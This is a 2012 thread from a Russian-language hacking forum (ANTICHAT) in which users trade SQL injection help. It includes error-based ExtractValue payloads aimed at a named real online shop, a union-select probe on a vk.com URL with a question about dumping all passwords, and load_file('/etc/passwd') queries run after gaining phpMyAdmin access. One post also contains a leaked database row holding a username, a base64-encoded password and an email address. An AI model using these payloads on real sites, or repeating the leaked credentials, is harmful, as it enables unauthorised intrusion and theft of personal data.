ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.10.2012, 17:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от WendM
WendM said:
А что делает функция ExtractValue () ?
http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html#function_extractvalue
подобными вопросами в гугл, не флудим в теме
|
|
|

20.10.2012, 17:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
http://vk.com/id1'+union+select+1,2,3+--+
Подскажите как вывести все пароли? Что я делаю не так?
|
|
|
|

20.10.2012, 18:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 2557
Репутация:
0
|
|
В sql бекапе нашел следующую запись
('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.u a','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')
dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?
Я только начинаю курить..
|
|
|
|

20.10.2012, 18:29
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от Aplik
Aplik said:
В sql бекапе нашел следующую запись
('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.u a','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')
dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?
Я только начинаю курить..
Кодировка base64
|
|
|

20.10.2012, 18:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 2557
Репутация:
0
|
|
Сообщение от Konqi
Konqi said:
Кодировка base64
спасибо
жалко только пароль не подходит
|
|
|
|

20.10.2012, 23:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
Сообщение от None
insert into ib4.a values ('(SELECT load_file("/etc/passwd")')
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?
|
|
|
|

20.10.2012, 23:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 193811
Репутация:
724
|
|
Сообщение от qaz
qaz said:
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?
Пробовал просто вывести?
Сообщение от None
SELECT load_file("/etc/passwd")
С кавычками играл?
|
|
|
|

20.10.2012, 23:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от qaz
qaz said:
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?
епрст! ну сколько можно. когда наконец откроете гребанный учебник по MySQL?
все что внутри кавычек - называется строкой
вы пишите текст, потом удивляетесь
insert into tbl (`wtf`) values ((select load_file('/etc/passwd')))
|
|
|

21.10.2012, 08:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 11466
Репутация:
3
|
|
Сообщение от Konqi
Konqi said:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1. html
Спасибо еще раз. Но дольше раскрутить не могу.
Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html
Но выдает ошибку 406. Что можно сделать?
|
|
|
|

21.10.2012, 09:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от WendM
WendM said:
Спасибо еще раз. Но дольше раскрутить не могу.
Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html
Но выдает ошибку 406. Что можно сделать?
лимит использовать
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|